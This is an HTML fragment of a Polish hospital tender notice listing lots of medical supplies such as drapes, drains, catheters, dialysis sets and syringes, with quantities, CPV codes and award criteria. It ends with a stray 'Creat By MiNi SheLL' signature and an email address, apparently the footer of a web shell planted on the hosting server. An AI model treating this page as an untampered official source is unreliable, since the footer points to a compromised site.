3	Sterylna osłona na ramię CTrzy częściowa sterylna osłona na ramię Cskładająca się z: Przeźroczysta osłona wykonana z folii PE o grubości min. 0,05mm, ściągnięta gumką o średnicy 80 cm. W ilości dwóch sztuk oraz osłona na ramię ruchome o wymiarach: 50x250 wyposażona na całej długości w taśmy lepne pozwalające na prawidłowe mocowanie pracującego ramienia.	 szt.	300
4.	Sterylna ściereczka chłonna o wymiarach min. 30x40 cm, wykonana z bardzo chłonnej celulozy, o gramaturze min. 50gm2 , służąca do wycierania rąk przez operatora po myciu chirurgicznym oraz osuszania jałowych powierzchni, kolor  biały.	 szt.	5000
5.	Serweta sterylna z taśmą lepną wykonana z laminatu nieprzemakalnego z warstwą chłonną o gramaturze minimum 60gm2 , minimalnej odporności na penetrację płynów (nieprzemakalność): => 100 cm oraz wytrzymałości na rozerwanie 100 Kpa. Rozmiar : 50x60.	 szt.	2000
6.	Serweta sterylna z taśmą lepną wykonana z laminatu nieprzemakalnego z warstwą chłonną o gramaturze minimum 60gm2 , minimalnej odporności na penetrację płynów ( nieprzemakalność): => 100 cm oraz wytrzymałości na rozerwanie 100 Kpa. Rozmiar: 75x90.	 szt.	1000
7.	Serweta sterylna z taśmą lepną wykonana z laminatu nieprzemakalnego z warstwą chłonną o gramaturze minimum 60gm2 , minimalnej odporności na penetrację płynów (nieprzemakalność): => 100 cm oraz wytrzymałość na rozerwanie 100 Kpa. Rozmiar: 100x150.	 szt.	1000
 8.	Serweta sterylna do przykrycia stołu instrumentalnego minimum dwuwarstwowa wykonana z laminatu nieprzemakalnego z warstwą chłonną o gramaturze minimum 60gm2 , minimalnej odporności na penetrację płynów (nieprzemakalność): => 100 cm oraz wytrzymałości na rozerwanie 100 Kpa o wymiarach: 150x200cm.	 szt.	300.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 19.52.00.00-7, 19.73.20.00-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 22.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50</li>
<li>2. Jakość - 50</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Pakiet.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zestaw pościelowy, jednorazowy wykonany z włókniny trzywarstwowej typu SMS o minimalnej gramaturze 35g/m2 oraz wytrzymałości na rozrywanie minimum 80 kPa.Skład zestawu: poszewka 80x90, poszwa 160x210, prześcieradło 140x210.	szt.	1 500.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 19.73.20.00-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 22.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50</li>
<li>2. Jakość - 50</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Pakiet.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Szpatułki - patyczki do mycia jamy ustnej nasączone płynem  do higieny jamy ustnej - krótkie	szt.	12 000
2.	Szpatułki- patyczki do mycia jamy ustnej nasączone płynem  do higieny jamy ustnej - długie	szt.	2 000.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 19.52.00.00-7.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 22.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50</li>
<li>2. Jakość - 50</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Pakiet.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Bezigłowy system dostępu do linii infuzyjnej - sterylny:-	redukcja przypadkowych zakażeń przez dotyk, bez potrzeby stosowania dodatkowego koreczka,-	efektywna bariera dla mikroorganizmów, jeśli przecierany środkiem dezynfekcyjnym do połączeń luer lock, luer slip,-	bez lateksu,-	nie zawiera DEHP,-	redukcja okluzji cewnika,-	optymalna wielkość i funkcja.	szt.	1 500.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.41.20-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 22.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50</li>
<li>2. Jakość - 50</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Pakiet.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Torba na wymiociny typu Vommax	szt.	 1 000.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 19.52.00.00-7.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 22.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50</li>
<li>2. Jakość - 50</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> Jakość.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Strzykawka trzyczęściowa z gumką z podwójnym uszczelnieniem, niskooporowa 5 ml. z końcówką Luer - Lock, każda osobno pakowana.	szt.	1 500.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.13.10-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 22.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50</li>
<li>2. Jakość - 50</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> Pakiet.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Dren Kehra (T) -  lateks silikonowany - dł. ramion min. 700x160mm o rozmiarach: 10, 12, 14, 16, 18, 20, 22, 24.	 szt.	       260
2	Dren Latex sterylny do jamy otrzewnowej o rozmiarach: 18, 20, 22, 24, 26, 28, 30, 32, 34, 36.	szt. 	900 
3	Dren Redona dł. Min. 80cm z paskiem RTG, opakowanie foliowe i zewnętrznie folia/papier o rozmiarach: 10, 12, 14, 16, 18.	szt. 	3200 
4	Pojemnik typu Redon - poj. Min. 200ml - skalowany co 25ml, z uniwersalnym zakończeniem do drenów Redona Ch 10-18 - opakowanie folia i zewnętrznie folia/papier	szt.	2500
 5	Pojemnik typu Redon - poj. Min. 400ml - skalowany co 100 ml, z uniwersalnym zakończeniem do drenów Redona Ch 10-18 - opakowanie folia i zewnętrznie folia/papier	szt.	1000.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.16.20-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 22.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 16 <b>NAZWA:</b> Pakiet.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Cewnik Tieman sterylny o rozmiarach: 6, 8, 10, 12, 14, 16, 18, 20, 22.	szt. 	      420
2	Cewnik Pezzera - silikonowy o rozmiarach: 28, 30, 32, 34, 36.	szt. 	      100.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.16.20-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 22.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 17 <b>NAZWA:</b> Pakiet.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Łączniki do drenów - schodkowe - proste o średnicy:	 	 
 	6-15-6 mm.	szt.	40
 	4-4 mm.	szt.	40
 	7-7 mm.	szt.	40
 	10-10 mm.	szt.	40
 	4-7 mm.	szt.	100
 	4-10 mm.	szt.	40
 	7-10 mm.	szt.	40
 	13-13 mm.	szt.	40.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 22.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 18 <b>NAZWA:</b> Pakiet.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Zestaw do hemofiltracji: A-V	szt. 	        15
2	Hemofiltry	szt.	        30
3 	Cewniki pojedyńcze 	szt. 	        20.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 19.52.00.00-7.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 22.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 19 <b>NAZWA:</b> Pakiet.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Zestaw do aparatu Prisma M100 PRE	szt. 	       30
2 	Zestaw do aparatu set 	szt.	       30
2 	Cewniki do hemodializy	szt.	       60
3 	Płyn dializacyjny Dialisan	szt. 	       60 
4	Płyn dializacyjny Hemosol	szt.	       60.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.13.20-9.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 22.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 20 <b>NAZWA:</b> Pakiet.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Sonda Miller-Abbott długości min. 270 mm 	szt.	20.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.13.20-9.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 22.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 21 <b>NAZWA:</b> Pakiet.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zestaw do punkcji jamy brzusznej z workiem o pojemności 1000-2000 ml. Z możliwością wymiany worka w trakcie zabiegu i pobrania próbki do badania.  	szt.	40.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 22.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 22 <b>NAZWA:</b> Pakiet.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zestaw do upustu krwi o pojemności 0,5-1.0  litra.	szt.	             50.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 22.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 23 <b>NAZWA:</b> Pakiet.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Jednorazowa igła do punkcji jamy brzusznej  Troacar o rozmiarach: 20, 28.	szt.	35.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.12.41.30-5.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 22.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 24 <b>NAZWA:</b> Pakiet.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ochraniacze na buty włókninowe, wiązane	szt.	1000.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.13.20-9.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 22.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 25 <b>NAZWA:</b> Pakiet.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Podgłówek wykonany z gąbki do operacji tarczycy o wymiarach około 46x18 cm.	szt.	40
2	Pozycjoner głowy szczelinowy wykonany z gąbki	szt.	72
3	Ochraniacz do stóp i pięt wykonany z gąbki 	szt.	36
4	Pozycjoner pod głowę pierścieniowy z gąbki	szt.	36
5	Klin do układania pacjenta 46x20x20 cm z gąbki 	szt.	16
6	Wałek pod klatkę piersiową 43x13cm z gąbki	szt.	12
7	Czyścik do koagulacji 5x5 cm.	szt.	200
8	Okulary do fototerapii ochronne na oczy. Miękki  materiał na rzep- dla noworodków	szt.	400.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 19.73.20.00-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 22.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 26 <b>NAZWA:</b> Pakiet.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Elektroda Qiuk-Combo do stymulacji zewnetrznej i defibrylacji kompatybilne z aparatem Lifepact - jednorazowego użytku 	szt.	50.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.16.20-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 22.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 27 <b>NAZWA:</b> Pakiet.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Wzierniki jednorazowe typu CUSCO o rozmiarach: S, M, L.	szt.	11 000
2	Szczotka cytologiczna wachlarz-sterylna	szt.	 5 000.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 41.00.00.00-9.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 22.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com